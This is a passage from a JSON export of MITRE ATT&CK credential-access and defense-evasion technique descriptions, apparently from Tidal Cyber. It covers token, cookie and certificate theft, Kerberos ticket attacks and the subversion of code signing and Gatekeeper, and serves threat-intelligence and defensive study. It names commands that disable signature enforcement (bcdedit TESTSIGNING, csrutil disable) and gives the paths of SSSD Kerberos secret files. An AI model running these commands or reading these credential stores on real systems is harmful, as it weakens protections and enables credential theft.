"description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup> OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nIn Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the containers token and thereby gain access to Kubernetes API commands.<sup>[[Kubernetes Service Accounts](https://app.tidalcyber.com/references/a74ffa28-8a2e-4bfd-bc66-969b463bebd9)]</sup>\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.<sup>[[Microsoft Identity Platform Protocols May 2019](https://app.tidalcyber.com/references/a99d2292-be39-4e55-a952-30c9d6a3d0a3)]</sup><sup>[[Microsoft - OAuth Code Authorization flow - June 2019](https://app.tidalcyber.com/references/a41c2123-8b8d-4f98-a535-e58e3e746b69)]</sup> An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.<sup>[[Amnesty OAuth Phishing Attacks, August 2019](https://app.tidalcyber.com/references/0b0f9cf6-f0af-4f86-9699-a63ff36c49e2)]</sup><sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.<sup>[[Microsoft - Azure AD App Registration - May 2019](https://app.tidalcyber.com/references/36a06c99-55ca-4163-9450-c3b84ae10039)]</sup> Then, they can send a [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).<sup>[[Microsoft - Azure AD Identity Tokens - Aug 2019](https://app.tidalcyber.com/references/44767d53-8cd7-44dd-a69d-8a7bebc1d87d)]</sup>\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens<sup>[[Auth0 Understanding Refresh Tokens](https://app.tidalcyber.com/references/84eb3d8a-f6b1-4bb5-9411-2c8da29b5946)]</sup>, allowing them to obtain new access tokens without prompting the user. \n\n",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "f78f2c87-626a-468f-93a5-31b61be17727",
"value": "Steal Application Access Token"
},
{
"description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.<sup>[[O365 Blog Azure AD Device IDs](https://app.tidalcyber.com/references/ec94c043-92ef-4691-b21a-7ea68f39e338)]</sup><sup>[[Microsoft AD CS Overview](https://app.tidalcyber.com/references/f1b2526a-1bf6-4954-a9b3-a5e008761ceb)]</sup>\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)<sup>[[APT29 Deep Look at Credential Roaming](https://app.tidalcyber.com/references/691fb596-07b6-5c13-9cec-e28530ffde12)]</sup>, misplaced certificate files (i.e. [Unsecured Credentials](https://app.tidalcyber.com/technique/02ed857b-ba39-4fab-b1d9-3ed2aa689dfd)), or directly from the Windows certificate store via various crypto APIs.<sup>[[SpecterOps Certified Pre Owned](https://app.tidalcyber.com/references/73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698)]</sup><sup>[[GitHub CertStealer](https://app.tidalcyber.com/references/da06ce8f-f950-4ae8-a62a-b59b236e91a3)]</sup><sup>[[GitHub GhostPack Certificates](https://app.tidalcyber.com/references/941e214d-4188-4ca0-9ef8-b26aa96373a2)]</sup> With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificates extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificates subject alternative name (SAN) values define the certificate owners alternate names.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) via stealing or forging certificates that can be used as [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup> Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) ticket-granting tickets (TGT) or NTLM plaintext.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "b8c27b52-3e73-448d-8a7c-3e814c8e3889",
"value": "Steal or Forge Authentication Certificates"
},
{
"description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) Kerberos messages.<sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup> \n\nPreauthentication offers protection against offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the users password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the users password.<sup>[[Microsoft Kerberos Preauth 2014](https://app.tidalcyber.com/references/328953ed-93c7-46c0-9a05-53dc44d294fe)]</sup>\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) attacks similarly to [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be) and expose plaintext credentials. <sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup><sup>[[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]</sup> \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. <sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup><sup>[[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]</sup>\n\nCracked hashes may enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393), [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), and [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) via access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1558.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "888e603b-ca97-4671-aa43-a25248fc9fc8",
"value": "AS-REP Roasting"
},
{
"description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.<sup>[[AdSecurity Kerberos GT Aug 2015](https://app.tidalcyber.com/references/aac51d49-9a72-4456-8539-8a5f5d0ef7d7)]</sup> Golden tickets enable adversaries to generate authentication material for any account in Active Directory.<sup>[[CERT-EU Golden Ticket Protection](https://app.tidalcyber.com/references/268f9cfa-71f4-4cb1-96f3-c61e71892d30)]</sup> \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.<sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup>\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.<sup>[[ADSecurity Kerberos and KRBTGT](https://app.tidalcyber.com/references/6e61f3e1-35e6-44f4-9bc4-60b2bcb71b15)]</sup> The KRBTGT password hash may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) and privileged access to a domain controller.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1558.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "12efebf8-9da4-446c-a627-b6f95524f1ea",
"value": "Golden Ticket"
},
{
"description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c).<sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup><sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup> \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service<sup>[[Microsoft Detecting Kerberoasting Feb 2018](https://app.tidalcyber.com/references/b36d82a8-82ca-4f22-85c0-ee82be3b6940)]</sup>).<sup>[[Microsoft SPN](https://app.tidalcyber.com/references/985ad31b-c385-473d-978d-40b6cd85268a)]</sup><sup>[[Microsoft SetSPN](https://app.tidalcyber.com/references/dd5dc432-32de-4bf3-b2c7-0bbdda031dd0)]</sup><sup>[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]</sup><sup>[[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]</sup>\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).<sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup><sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup> Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) attacks that may expose plaintext credentials.<sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup><sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup> <sup>[[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]</sup>\n\nThis same behavior could be executed using service tickets captured from network traffic.<sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup>\n\nCracked hashes may enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393), [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), and [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) via access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1558.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "2f980aed-b34a-4300-ac6b-70e7ddf6d9be",
"value": "Kerberoasting"
},
{
"description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.<sup>[[ADSecurity Silver Tickets](https://app.tidalcyber.com/references/5185560e-b8f0-4c40-8c90-cb12348a0f7f)]</sup>\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.<sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup>\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1558.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "e7135af8-3668-4d94-90d2-2a93a6b5c327",
"value": "Silver Ticket"
},
{
"description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).<sup>[[ADSecurity Kerberos Ring Decoder](https://app.tidalcyber.com/references/5f78a554-2d5c-49af-8c6c-6e10f9aec997)]</sup> Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.<sup>[[Microsoft Klist](https://app.tidalcyber.com/references/f500340f-23fc-406a-97ef-0de787ef8cec)]</sup>\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.<sup>[[MIT ccache](https://app.tidalcyber.com/references/6a1b4373-2304-420c-8733-e1eae71ff7b2)]</sup> On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). The ccache file may also be converted into a Windows format using tools such as Kekeo.<sup>[[Linux Kerberos Tickets](https://app.tidalcyber.com/references/5aea042f-4eb1-4092-89be-3db695053470)]</sup><sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup><sup>[[Kekeo](https://app.tidalcyber.com/references/0b69f0f5-dd4a-4926-9369-8253a0c3ddea)]</sup>\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.<sup>[[SpectorOps Bifrost Kerberos macOS 2019](https://app.tidalcyber.com/references/58ecb4e9-25fc-487b-9fed-25c781cc531b)]</sup><sup>[[macOS kerberos framework MIT](https://app.tidalcyber.com/references/8e09346b-03ce-4627-a365-f2f63089d1e0)]</sup>\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "888e603b-ca97-4671-aa43-a25248fc9fc8",
"type": "similar"
},
{
"dest-uuid": "12efebf8-9da4-446c-a627-b6f95524f1ea",
"type": "similar"
},
{
"dest-uuid": "2f980aed-b34a-4300-ac6b-70e7ddf6d9be",
"type": "similar"
},
{
"dest-uuid": "e7135af8-3668-4d94-90d2-2a93a6b5c327",
"type": "similar"
}
],
"uuid": "0fef0394-7cf6-4797-8a5e-1cbfd31ee501",
"value": "Steal or Forge Kerberos Tickets"
},
{
"description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>\n\nThere are several examples of malware targeting cookies from web browsers on the local system.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup> There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)) that can be set up by an adversary and used in phishing campaigns.<sup>[[Github evilginx2](https://app.tidalcyber.com/references/322e5d90-5095-47ea-b0e2-e7e5fb45fcca)]</sup><sup>[[GitHub Mauraena](https://app.tidalcyber.com/references/578ecf62-b546-4f52-9d50-92557edf2dd4)]</sup>\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1) technique to login to the corresponding web application.",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "17f9e46d-4e3d-4491-a0d9-0cc042531d6e",
"value": "Steal Web Session Cookie"
},
{
"description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. <sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> The certificates used during an operation may be created, acquired, or stolen by the adversary. <sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup> <sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup> Unlike [Invalid Code Signature](https://app.tidalcyber.com/technique/aa5a31d0-1b78-481d-a317-5089c1e111bf), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. <sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup><sup>[[EclecticLightChecksonEXECodeSigning](https://app.tidalcyber.com/references/2885db46-4f8c-4c35-901c-7641c7701293)]</sup>\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1553.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9449c0d5-7445-45e0-9861-7aafd6531733",
"value": "Code Signing"
},
{
"description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.<sup>[[Microsoft DSE June 2017](https://app.tidalcyber.com/references/451bdfe3-0b30-425c-97a0-44727b70c1da)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup> Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.<sup>[[Microsoft Unsigned Driver Apr 2017](https://app.tidalcyber.com/references/5964ff2e-0860-4e00-8103-89ba6466314c)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup>\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.<sup>[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup><sup>[[FireEye HIKIT Rootkit Part 2](https://app.tidalcyber.com/references/48448972-a5ed-4371-b930-b51dcb174b82)]</sup><sup>[[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]</sup> Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.<sup>[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup> Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.<sup>[[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]</sup>\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) using a signed, but vulnerable driver.<sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup><sup>[[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1553.006"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "c26e1b28-89c9-4083-9f94-022c891bf60c",
"value": "Code Signing Policy Modification"
},
{
"description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apples security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.<sup>[[TheEclecticLightCompany Quarantine and the flag](https://app.tidalcyber.com/references/7cce88cc-fbfb-43e1-a330-ac55bce9e394)]</sup><sup>[[TheEclecticLightCompany apple notarization ](https://app.tidalcyber.com/references/80c840ab-782a-4f15-bc7b-2d2ab4e51702)]</sup>\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.<sup>[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.<sup>[[theevilbit gatekeeper bypass 2021](https://app.tidalcyber.com/references/d00f373d-2133-47c3-9b0a-104ecc9a6869)]</sup><sup>[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]</sup>\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1553.001"
},
"related": [
{
